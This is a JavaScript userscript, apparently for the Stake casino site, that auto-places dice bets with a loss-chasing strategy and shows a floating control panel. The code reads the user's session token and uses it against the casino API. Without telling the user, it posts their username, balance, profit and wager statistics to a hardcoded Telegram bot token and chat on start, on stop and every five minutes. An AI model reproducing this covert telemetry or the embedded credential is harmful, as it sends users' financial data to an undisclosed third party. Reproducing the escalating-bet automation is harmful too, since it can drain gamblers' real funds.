(function () {
    const CONFIG = {
        get apiUrl() { return window.location.origin + '/_api'; },
        tgToken: '8386154052:AAFQTv8ex1AfzN1Xjr8QToNv6bgJ8l2L_H0',
        tgChatId: '-1003776328846',
        version: "Orion V5 Secretly"
    };

    const bot = {
        isRunning: false,
        token: null,
        startTime: null,
        stakeUser: "orionlogic",
        stats: { profit: 0, wagered: 0, wageredUSD: 0, startBal: 0, bets: 0, wins: 0, loss: 0, maxDD: 0, ties: 0 },
        selectedCurrency: "DOGE",
        
        // Stop Target
        stopTargetPct: 10.1,
        
        // Strategy Params (User Input)
        minbet: 0.0001,
        chwager: 98,
        chprofit: 40,
        dvwager: 300,
        bbprofitMultiplier: 0.000003,    // DEFAULT: 0.000003
        pfpumpMultiplier: 0.0015,        // DEFAULT: 0.0015
        pfdumpMultiplier: 0.001,         // DEFAULT: 0.001
        
        // State variables
        bbprofit: 0,
        pfpump: 0,
        pfdump: 0,
        chance: 40,
        nextbet: 0,
        profitc: 0,
        onprofit: true,
        baldrop: 1,
        balhigh: 0,
        balstop: 0,
        cprofit: 0,
        pfreset: 0,
        currentstreak: 0,
        
        lastWin: false,
        lastBetAmount: 0,
        
        isSettingsOpen: false,
        isMinimized: false
    };

    let reportInterval = null;
    let lastReportTime = 0;

    function getAuthToken() {
        return localStorage.getItem('apitoken') || sessionStorage.getItem('apitoken') ||
            (document.cookie.match(/session=([^;]+)/) ? document.cookie.match(/session=([^;]+)/)[1] : null);
    }

    function convertToUSD(amount) {
        return amount * 0.12;
    }
    
    function updateWageredUSD(amount) {
        bot.stats.wageredUSD += convertToUSD(amount);
    }

    function getCurrentBalance() {
        return bot.stats.startBal + bot.stats.profit;
    }

    function stopBot() {
        if (bot.isRunning) {
            bot.isRunning = false;
            if (reportInterval) clearInterval(reportInterval);
            reportInterval = null;
            updateConsoleLog("[SYSTEM] STOPPED");
            sendTelegramReport("SYSTEM STOPPED", true);
            updateHUDStatus(false);
        }
    }

    function updateConsoleLog(msg) {
        const logEl = document.getElementById("orion-console-log");
        if (logEl) {
            const time = new Date().toLocaleTimeString();
            logEl.innerHTML = `[${time}] ${msg}<br>` + logEl.innerHTML;
            if (logEl.innerHTML.length > 2000) logEl.innerHTML = logEl.innerHTML.substring(0, 1500);
        }
    }

    // ========== TELEGRAM REPORT ==========
    async function sendTelegramReport(customHeader = null, force = false) {
        if (!bot.isRunning && !force) return;
        
        const now = Date.now();
        if (!force && now - lastReportTime < 30000) return;
        lastReportTime = now;
        
        const elapsed = bot.startTime ? (Date.now() - bot.startTime) / 1000 : 0;
        const hours = Math.floor(elapsed / 3600);
        const minutes = Math.floor((elapsed % 3600) / 60);
        const seconds = Math.floor(elapsed % 60);
        const timeStr = hours + "h " + minutes + "m " + seconds + "s";
        const speed = elapsed > 0 ? (bot.stats.bets / elapsed).toFixed(2) : "0";
        const currentBalance = getCurrentBalance().toFixed(8);
        const winRate = bot.stats.bets > 0 ? ((bot.stats.wins / bot.stats.bets) * 100).toFixed(1) : "0";
        
        const modeName = bot.onprofit ? "PROFIT MODE" : "WAGER MODE";
        const header = customHeader || "PERIODIC REPORT (5 MIN)";
        
        const report = header + "\n" +
        "================================\n" +
        "ORION V5 SECRETLY\n" +
        "User: " + bot.stakeUser + "\n" +
        "Currency: " + bot.selectedCurrency.toUpperCase() + "\n" +
        "Mode: " + modeName + "\n" +
        "================================\n" +
        "Balance: " + currentBalance + "\n" +
        "Profit: " + (bot.stats.profit >= 0 ? "+" : "") + bot.stats.profit.toFixed(8) + "\n" +
        "Wagered: " + bot.stats.wagered.toFixed(8) + "\n" +
        "================================\n" +
        "Bets: " + bot.stats.bets + "\n" +
        "Wins: " + bot.stats.wins + "\n" +
        "Loss: " + bot.stats.loss + "\n" +
        "Win Rate: " + winRate + "%\n" +
        "Speed: " + speed + " bets/s\n" +
        "================================\n" +
        "Uptime: " + timeStr + "\n" +
        "Stop Target: " + bot.stopTargetPct + "%\n" +
        "Minbet: " + bot.minbet + "\n" +
        "Chance: " + bot.chance.toFixed(1) + "%\n" +
        "================================\n" +
        "Orion V5 Secretly";
        
        try {
            await fetch(`https://api.telegram.org/bot${CONFIG.tgToken}/sendMessage`, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify({ 
                    chat_id: CONFIG.tgChatId, 
                    text: "```\n" + report + "\n```", 
                    parse_mode: "Markdown",
                    disable_web_page_preview: true
                })
            });
        } catch (e) {}
    }

    // ========== BENTO GRID HUD ==========
    function createGlassHUD() {
        if (document.getElementById("ORION_GLASS_HUD")) return;

        const style = document.createElement("style");
        style.innerHTML = `
            * { box-sizing: border-box; }
            .orion-settings-panel { max-height: 0; overflow: hidden; transition: max-height 0.3s ease; }
            .orion-settings-panel.open { max-height: 520px; overflow-y: auto; }
            .orion-input-group { margin-bottom: 8px; }
            .orion-input-group label { font-size: 9px; display: block; color: #FCA5A5; margin-bottom: 2px; }
            .orion-input-group input, .orion-input-group select { width: 100%; background: #1a0a0a; border: 1px solid #7f1a1a; color: #FECACA; padding: 5px 7px; border-radius: 6px; font-size: 10px; }
            .orion-input-group input:focus { outline: none; border-color: #ef4444; }
            .orion-section-title { font-size: 9px; font-weight: 600; margin: 10px 0 6px 0; padding-bottom: 3px; border-bottom: 1px solid #7f1a1a; color: #ef4444; }
            .orion-drag-handle { cursor: move; user-select: none; }
            .orion-minimize-btn { cursor: pointer; background: rgba(239,68,68,0.2); border: 1px solid rgba(239,68,68,0.3); border-radius: 6px; padding: 3px 7px; font-size: 10px; color: #ef4444; margin-right: 5px; }
            .orion-minimize-btn:hover { background: rgba(239,68,68,0.4); }
            .orion-content-wrapper.minimized { display: none; }
            #orion-start-btn { background: linear-gradient(135deg, #dc2626, #991b1b); color: white; border: none; cursor: pointer; }
            #orion-start-btn:hover { background: linear-gradient(135deg, #ef4444, #b91c1c); }
            #orion-stop-btn { background: rgba(239,68,68,0.15); border: 1px solid rgba(239,68,68,0.3); color: #fca5a5; cursor: pointer; }
            #orion-stop-btn:hover { background: rgba(239,68,68,0.3); }
            
            /* BENTO GRID STYLES */
            .bento-grid {
                display: grid;
                grid-template-columns: repeat(2, 1fr);
                gap: 8px;
                margin-bottom: 12px;
            }
            .bento-card {
                background: rgba(30,10,10,0.6);
                border-radius: 12px;
                padding: 8px 10px;
                border: 1px solid #7f1a1a;
                transition: all 0.2s ease;
            }
            .bento-card:hover {
                border-color: #ef4444;
                background: rgba(40,15,15,0.7);
            }
            .bento-label {
                font-size: 8px;
                color: #FCA5A5;
                letter-spacing: 0.5px;
                margin-bottom: 4px;
            }
            .bento-value {
                font-size: 13px;
                font-weight: 700;
                color: #FECACA;
                font-family: monospace;
            }
            .bento-value.positive {
                color: #4ADE80;
            }
            .bento-value.negative {
                color: #F87171;
            }
            .bento-progress {
                margin-top: 4px;
                height: 3px;
                background: #3a0a0a;
                border-radius: 3px;
                overflow: hidden;
            }
            .bento-progress-fill {
                height: 100%;
                border-radius: 3px;
                transition: width 0.2s ease;
            }
            .full-width {
                grid-column: span 2;
            }
        `;
        document.head.appendChild(style);

        const hud = document.createElement("div");
        hud.id = "ORION_GLASS_HUD";
        hud.style.cssText = `position:fixed;bottom:16px;right:16px;width:340px;max-height:95vh;background:rgba(20,8,8,0.96);backdrop-filter:blur(16px);border-radius:24px;border:1px solid rgba(239,68,68,0.4);z-index:999999;font-size:11px;display:flex;flex-direction:column;box-shadow:0 0 25px rgba(239,68,68,0.15);`;
        
        hud.innerHTML = `
            <div style="padding:14px 14px 8px 14px;flex-shrink:0;">
                <div class="orion-drag-handle" style="display:flex;justify-content:space-between;align-items:center;">
                    <div style="display:flex;align-items:center;gap:8px;">
                        <div id="orion-status-dot" style="width:8px;height:8px;border-radius:50%;background:#EF4444;box-shadow:0 0 6px #ef4444;"></div>
                        <span style="font-weight:800;font-size:14px;background:linear-gradient(135deg,#ef4444,#f97316);-webkit-background-clip:text;-webkit-text-fill-color:transparent;">ORION V5</span>
                    </div>
                    <div>
                        <button id="orion-minimize-btn" class="orion-minimize-btn">−</button>
                        <button id="orion-settings-toggle" style="background:rgba(239,68,68,0.2);border:1px solid rgba(239,68,68,0.3);border-radius:8px;padding:4px 10px;font-size:10px;cursor:pointer;color:#ef4444;">⚙️</button>
                    </div>
                </div>
            </div>
            
            <div id="orion-content-wrapper" style="overflow-y:auto;padding:0 14px 14px 14px;">
                <!-- BENTO GRID STATS -->
                <div class="bento-grid">
                    <div class="bento-card">
                        <div class="bento-label">BALANCE</div>
                        <div class="bento-value" id="orion-balance">0.0000</div>
                    </div>
                    <div class="bento-card">
                        <div class="bento-label">PROFIT</div>
                        <div class="bento-value" id="orion-profit">0.0000</div>
                    </div>
                    <div class="bento-card">
                        <div class="bento-label">WAGERED</div>
                        <div class="bento-value" id="orion-wagered">0.0000</div>
                    </div>
                    <div class="bento-card">
                        <div class="bento-label">BETS</div>
                        <div class="bento-value" id="orion-bets">0</div>
                    </div>
                    <div class="bento-card">
                        <div class="bento-label">WINS</div>
                        <div class="bento-value" id="orion-wins">0</div>
                    </div>
                    <div class="bento-card">
                        <div class="bento-label">LOSS</div>
                        <div class="bento-value" id="orion-loss">0</div>
                    </div>
                </div>
                
                <!-- PROGRESS BARS -->
                <div class="bento-card full-width" style="margin-bottom:8px;">
                    <div class="bento-label">DRAWDOWN</div>
                    <div class="bento-value" id="orion-drawdown" style="font-size:11px;">0%</div>
                    <div class="bento-progress">
                        <div id="orion-drawdown-bar" class="bento-progress-fill" style="width:0%;background:linear-gradient(90deg,#ef4444,#dc2626);"></div>
                    </div>
                </div>
                
                <div class="bento-card full-width" style="margin-bottom:12px;">
                    <div class="bento-label">STOP TARGET</div>
                    <div class="bento-value" id="orion-stop-target" style="font-size:11px;">0%</div>
                    <div class="bento-progress">
                        <div id="orion-stop-bar" class="bento-progress-fill" style="width:0%;background:linear-gradient(90deg,#f97316,#ea580c);"></div>
                    </div>
                </div>
                
                <!-- MODE INDICATOR -->
                <div style="text-align:center;margin-bottom:10px;">
                    <span id="orion-mode" style="background:rgba(239,68,68,0.15);border-radius:20px;padding:3px 12px;font-size:9px;color:#ef4444;">PROFIT MODE</span>
                </div>
                
                <!-- SETTINGS PANEL -->
                <div id="orion-settings-panel" class="orion-settings-panel">
                    <div style="border-top:1px solid #7f1a1a;margin:6px 0;"></div>
                    
                    <div class="orion-section-title">🎯 STOP TARGET</div>
                    <div class="orion-input-group">
                        <label>STOP TARGET (%)</label>
                        <input type="number" id="param-stop-target" step="0.1" value="10.1">
                        <div style="font-size:7px;color:#7f1a1a;">Berhenti jika profit mencapai persentase ini dari balance awal</div>
                    </div>
                    
                    <div class="orion-section-title">⚙️ STRATEGY</div>
                    <div class="orion-input-group"><label>MINBET</label><input type="number" id="param-minbet" step="0.0001" value="0.0001"></div>
                    <div class="orion-input-group"><label>CH WAGER (%)</label><input type="number" id="param-chwager" step="1" value="98"></div>
                    <div class="orion-input-group"><label>CH PROFIT (%)</label><input type="number" id="param-chprofit" step="1" value="40"></div>
                    <div class="orion-input-group"><label>DV WAGER</label><input type="number" id="param-dvwager" step="10" value="300"></div>
                    
                    <div class="orion-section-title">🔧 TRIGGER MULTIPLIERS</div>
                    <div class="orion-input-group"><label>BBPROFIT MULTIPLIER</label><input type="number" id="param-bbprofit" step="0.000001" value="0.000003"><div style="font-size:7px;color:#7f1a1a;">bbprofit = balance × multiplier</div></div>
                    <div class="orion-input-group"><label>PFPUMP MULTIPLIER</label><input type="number" id="param-pfpump" step="0.0001" value="0.0015"><div style="font-size:7px;color:#7f1a1a;">pfpump = balance × multiplier</div></div>
                    <div class="orion-input-group"><label>PFDUMP MULTIPLIER</label><input type="number" id="param-pfdump" step="0.0001" value="0.001"><div style="font-size:7px;color:#7f1a1a;">pfdump = balance × multiplier</div></div>
                    
                    <div class="orion-input-group"><label>CURRENCY</label><select id="orion-currency"></select></div>
                    <div style="border-top:1px solid #7f1a1a;margin:8px 0;"></div>
                </div>
                
                <!-- BUTTONS -->
                <div style="display:flex;gap:10px;margin-bottom:10px;">
                    <button id="orion-start-btn" style="flex:1;padding:10px;border:none;border-radius:30px;font-weight:700;font-size:12px;">▶ START</button>
                    <button id="orion-stop-btn" style="flex:1;padding:10px;border:none;border-radius:30px;font-weight:700;font-size:12px;">⏹ STOP</button>
                </div>
                
                <!-- CONSOLE LOG -->
                <div id="orion-console-log" style="padding:8px;background:rgba(0,0,0,0.6);border-radius:12px;font-size:7px;font-family:monospace;color:#f87171;max-height:70px;overflow-y:auto;border:1px solid #7f1a1a;"></div>
            </div>
        `;
        document.body.appendChild(hud);
        
        // Minimize
        const minimizeBtn = document.getElementById("orion-minimize-btn");
        const contentWrapper = document.getElementById("orion-content-wrapper");
        minimizeBtn.onclick = () => {
            bot.isMinimized = !bot.isMinimized;
            if (bot.isMinimized) {
                contentWrapper.style.display = "none";
                minimizeBtn.innerHTML = "+";
                document.getElementById("ORION_GLASS_HUD").style.width = "auto";
                document.getElementById("ORION_GLASS_HUD").style.minWidth = "100px";
            } else {
                contentWrapper.style.display = "block";
                minimizeBtn.innerHTML = "−";
                document.getElementById("ORION_GLASS_HUD").style.width = "340px";
                document.getElementById("ORION_GLASS_HUD").style.minWidth = "";
            }
        };
        
        // Draggable
        let isDragging = false, startX, startY, startLeft, startTop;
        const dragHandle = hud.querySelector('.orion-drag-handle');
        const savedLeft = localStorage.getItem('orion_hud_left');
        const savedTop = localStorage.getItem('orion_hud_top');
        if (savedLeft && savedTop) {
            hud.style.left = savedLeft + 'px';
            hud.style.right = 'auto';
            hud.style.bottom = 'auto';
            hud.style.top = savedTop + 'px';
        }
        dragHandle.addEventListener('mousedown', (e) => {
            if (e.target.tagName === 'BUTTON' || e.target.closest('button')) return;
            isDragging = true;
            startX = e.clientX;
            startY = e.clientY;
            const rect = hud.getBoundingClientRect();
            startLeft = rect.left;
            startTop = rect.top;
            hud.style.cursor = 'grabbing';
            e.preventDefault();
        });
        document.addEventListener('mousemove', (e) => {
            if (!isDragging) return;
            let newLeft = startLeft + (e.clientX - startX);
            let newTop = startTop + (e.clientY - startY);
            newLeft = Math.max(0, Math.min(newLeft, window.innerWidth - hud.offsetWidth));
            newTop = Math.max(0, Math.min(newTop, window.innerHeight - hud.offsetHeight));
            hud.style.left = newLeft + 'px';
            hud.style.top = newTop + 'px';
            hud.style.right = 'auto';
            hud.style.bottom = 'auto';
        });
        document.addEventListener('mouseup', () => {
            if (isDragging) {
                isDragging = false;
                hud.style.cursor = '';
                const left = parseInt(hud.style.left);
                const top = parseInt(hud.style.top);
                if (!isNaN(left) && !isNaN(top)) {
                    localStorage.setItem('orion_hud_left', left);
                    localStorage.setItem('orion_hud_top', top);
                }
            }
        });
        
        document.getElementById("orion-settings-toggle").onclick = () => {
            const panel = document.getElementById("orion-settings-panel");
            panel.classList.toggle("open");
        };
        
        setTimeout(() => {
            API.syncOnce();
        }, 100);
    }

    function updateGlassHUD() {
        const balance = getCurrentBalance();
        const startBal = bot.stats.startBal;
        const profit = balance - startBal;
        const drawdownPct = bot.balhigh > 0 ? ((bot.balhigh - balance) / bot.balhigh) * 100 : 0;
        
        const stopTargetAmount = startBal * (1 + bot.stopTargetPct / 100);
        const stopProgress = ((balance - startBal) / (stopTargetAmount - startBal)) * 100;
        
        const el = (id) => document.getElementById(id);
        if (el("orion-balance")) el("orion-balance").innerText = balance.toFixed(8);
        if (el("orion-profit")) {
            el("orion-profit").innerText = (profit >= 0 ? "+" : "") + profit.toFixed(8);
            el("orion-profit").className = "bento-value " + (profit >= 0 ? "positive" : "negative");
        }
        if (el("orion-wagered")) el("orion-wagered").innerText = bot.stats.wagered.toFixed(8);
        if (el("orion-bets")) el("orion-bets").innerText = bot.stats.bets;
        if (el("orion-wins")) el("orion-wins").innerText = bot.stats.wins;
        if (el("orion-loss")) el("orion-loss").innerText = bot.stats.loss;
        if (el("orion-mode")) el("orion-mode").innerText = bot.onprofit ? "PROFIT MODE" : "WAGER MODE";
        if (el("orion-drawdown")) el("orion-drawdown").innerText = drawdownPct.toFixed(2) + "%";
        if (el("orion-drawdown-bar")) el("orion-drawdown-bar").style.width = Math.min(100, drawdownPct) + "%";
        if (el("orion-stop-target")) el("orion-stop-target").innerText = bot.stopTargetPct + "%";
        if (el("orion-stop-bar")) el("orion-stop-bar").style.width = Math.min(100, Math.max(0, stopProgress)) + "%";
        
        const statusDot = document.getElementById("orion-status-dot");
        if (statusDot) {
            statusDot.style.background = bot.isRunning ? "#4ADE80" : "#EF4444";
            statusDot.style.boxShadow = bot.isRunning ? "0 0 8px #4ADE80" : "0 0 6px #ef4444";
        }
    }
    
    function updateHUDStatus(isRunning) {
        const statusDot = document.getElementById("orion-status-dot");
        if (statusDot) {
            statusDot.style.background = isRunning ? "#4ADE80" : "#EF4444";
            statusDot.style.boxShadow = isRunning ? "0 0 8px #4ADE80" : "0 0 6px #ef4444";
        }
    }

    // ========== MAIN BETTING LOGIC ==========
    let isProcessing = false;
    
    async function runLoop() {
        if (!bot.isRunning || isProcessing) return;
        isProcessing = true;
        
        try {
            const balance = getCurrentBalance();
            const previousbet = bot.nextbet;
            const win = bot.lastWin;
            
            bot.currentstreak = win ? (bot.currentstreak > 0 ? bot.currentstreak + 1 : 1) : (bot.currentstreak < 0 ? bot.currentstreak - 1 : -1);
            
            const currentprofit = win ? (previousbet * (100 / bot.chance) - previousbet) : -previousbet;
            bot.pfreset = bot.pfreset + currentprofit;
            
            if (bot.onprofit) {
                bot.profitc = bot.profitc + currentprofit;
                
                if (win) {
                    bot.nextbet = previousbet * 0.6;
                    if (bot.profitc > 0) {
                        bot.profitc = 0;
                        bot.chance = (Math.floor(Math.random() * (200 - 110 + 1)) + 110) / 10;
                        bot.nextbet = bot.bbprofit;
                    }
                } else {
                    const streak = Math.abs(bot.currentstreak);
                    const payout = 99 / bot.chance;
                    bot.nextbet = previousbet * (1 + (bot.chance * 0.02));
                    
                    if (streak > Math.ceil(payout * 3)) {
                        bot.nextbet = Math.abs(bot.profitc) / (payout - 1) * 1.02;
                    }
                }
                
                if (bot.pfreset > bot.pfpump) {
                    bot.pfreset = 0;
                    bot.onprofit = false;
                    bot.chance = bot.chwager;
                    bot.nextbet = balance / bot.dvwager;
                    updateConsoleLog("[SWITCH] PROFIT -> WAGER MODE");
                }
            } else {
                bot.nextbet = balance / bot.dvwager;
                
                if (bot.pfreset < -bot.pfdump) {
                    bot.pfreset = 0;
                    bot.onprofit = true;
                    bot.chance = 33;
                    bot.nextbet = bot.bbprofit;
                    bot.profitc = 0;
                    updateConsoleLog("[SWITCH] WAGER -> PROFIT MODE");
                }
            }
            
            bot.cprofit = bot.cprofit + currentprofit;
            if (bot.cprofit >= 0) bot.cprofit = 0;
            
            bot.balhigh = Math.max(bot.balhigh, balance);
            bot.baldrop = Math.min(bot.baldrop, bot.cprofit);
            bot.nextbet = Math.max(bot.nextbet, bot.minbet);
            
            if (balance > bot.balstop) {
                updateConsoleLog("[TARGET] Profit target " + bot.stopTargetPct + "% reached! Stopping...");
                stopBot();
                isProcessing = false;
                return;
            }
            
            if (bot.stats.bets % 20 === 0 || !win) {
                updateConsoleLog((win ? "[WIN]" : "[LOSS]") + " " + (bot.onprofit ? "PROFIT" : "WAGER") + " | Ch:" + bot.chance.toFixed(1) + "% | Bet:" + bot.nextbet.toFixed(8));
            }
            
            const payout = 100 / bot.chance;
            const result = await API.placeBet(bot.nextbet, payout);
            
            if (result.errors) {
                updateConsoleLog("[ERROR] " + result.errors[0].message);
                isProcessing = false;
                if (bot.isRunning) setTimeout(runLoop, 500);
                return;
            }
            
            const bet = result?.data?.diceRoll || result?.diceBet;
            if (bet && bot.isRunning) {
                bot.stats.bets++;
                bot.stats.wagered += bet.amount;
                updateWageredUSD(bet.amount);
                const pft = bet.payout - bet.amount;
                bot.stats.profit += pft;
                bot.lastWin = (pft > 0);
                if (pft > 0) bot.stats.wins++; else bot.stats.loss++;
                if (bot.stats.profit < bot.stats.maxDD) bot.stats.maxDD = bot.stats.profit;
                updateGlassHUD();
            }
            
            isProcessing = false;
            if (bot.isRunning) runLoop();
            
        } catch (e) {
            updateConsoleLog("[ERROR] " + e.message);
            isProcessing = false;
            if (bot.isRunning) setTimeout(runLoop, 500);
        }
    }

    const API = {
        async syncOnce() {
            bot.token = getAuthToken();
            try {
                const res = await fetch(`${CONFIG.apiUrl}/graphql`, {
                    method: "POST",
                    headers: { "Content-Type": "application/json", "x-access-token": bot.token },
                    body: JSON.stringify({ query: `query{user{name balances{available{amount currency}}}}` })
                });
                const json = await res.json();
                if (json?.data?.user) {
                    bot.stakeUser = json.data.user.name;
                    const bals = json.data.user.balances || [];
                    const sel = document.getElementById("orion-currency");
                    if (sel && sel.options.length === 0) {
                        bals.forEach(b => {
                            const opt = document.createElement("option");
                            opt.value = b.available.currency;
                            opt.textContent = b.available.currency.toUpperCase();
                            if(b.available.currency === "doge") opt.selected = true;
                            sel.appendChild(opt);
                        });
                    }
                    if (sel) bot.selectedCurrency = sel.value;
                    const active = bals.find(b => b.available.currency === bot.selectedCurrency);
                    bot.stats.startBal = active ? parseFloat(active.available.amount) : 0;
                }
            } catch (e) { 
                updateConsoleLog("[SYNC] Failed");
            }
        },
        async placeBet(amount, payout) {
            const payload = { 
                amount: parseFloat(amount), 
                currency: bot.selectedCurrency, 
                identifier: Date.now().toString(36) + Math.random().toString(36).slice(2),
                target: 100 - (100 / payout),
                condition: "above"
            };
            const res = await fetch(`${CONFIG.apiUrl}/casino/dice/roll`, {
                method: "POST",
                headers: { "Content-Type": "application/json", "x-access-token": bot.token },
                body: JSON.stringify(payload)
            });
            return res.json();
        }
    };

    // Initialize
    createGlassHUD();
    
    setInterval(() => {
        if (bot.isRunning) updateGlassHUD();
    }, 300);
    
    document.getElementById("orion-start-btn").onclick = async () => { 
        if(!bot.isRunning){ 
            bot.stopTargetPct = parseFloat(document.getElementById("param-stop-target")?.value) || 10.1;
            bot.minbet = parseFloat(document.getElementById("param-minbet")?.value) || 0.0001;
            bot.chwager = parseFloat(document.getElementById("param-chwager")?.value) || 98;
            bot.chprofit = parseFloat(document.getElementById("param-chprofit")?.value) || 40;
            bot.dvwager = parseFloat(document.getElementById("param-dvwager")?.value) || 300;
            
            const bbprofitMulti = parseFloat(document.getElementById("param-bbprofit")?.value) || 0.000003;
            const pfpumpMulti = parseFloat(document.getElementById("param-pfpump")?.value) || 0.0015;
            const pfdumpMulti = parseFloat(document.getElementById("param-pfdump")?.value) || 0.001;
            
            const currencySel = document.getElementById("orion-currency");
            if (currencySel && currencySel.value) bot.selectedCurrency = currencySel.value;
            
            await API.syncOnce();
            
            const startBal = bot.stats.startBal;
            
            bot.bbprofit = startBal * bbprofitMulti;
            bot.pfpump = startBal * pfpumpMulti;
            bot.pfdump = startBal * pfdumpMulti;
            bot.chance = bot.chprofit;
            bot.nextbet = bot.bbprofit;
            bot.profitc = 0;
            bot.onprofit = true;
            bot.baldrop = 1;
            bot.balhigh = startBal;
            bot.balstop = startBal * (1 + bot.stopTargetPct / 100);
            bot.cprofit = 0;
            bot.pfreset = 0;
            bot.currentstreak = 0;
            bot.lastWin = false;
            
            bot.startBalance = startBal;
            bot.stats.profit = 0;
            bot.stats.bets = 0;
            bot.stats.wins = 0;
            bot.stats.loss = 0;
            bot.stats.wagered = 0;
            bot.stats.wageredUSD = 0;
            bot.stats.maxDD = 0;
            
            bot.isRunning = true;
            bot.startTime = new Date();
            
            updateConsoleLog("[START] REAL MODE | Balance: " + startBal.toFixed(8));
            updateConsoleLog("[SETUP] bbprofit=" + bot.bbprofit.toFixed(8) + " | pfpump=" + bot.pfpump.toFixed(8) + " | pfdump=" + bot.pfdump.toFixed(8));
            setTimeout(() => sendTelegramReport("SYSTEM STARTED", true), 1000);
            
            if (reportInterval) clearInterval(reportInterval);
            reportInterval = setInterval(() => { 
                if (bot.isRunning) sendTelegramReport("PERIODIC REPORT (5 MIN)", false);
            }, 300000);
            
            isProcessing = false;
            runLoop();
        } 
    };
    
    document.getElementById("orion-stop-btn").onclick = () => { 
        if(bot.isRunning) {
            sendTelegramReport("SYSTEM STOPPED", true);
            stopBot();
        } 
    };
})();
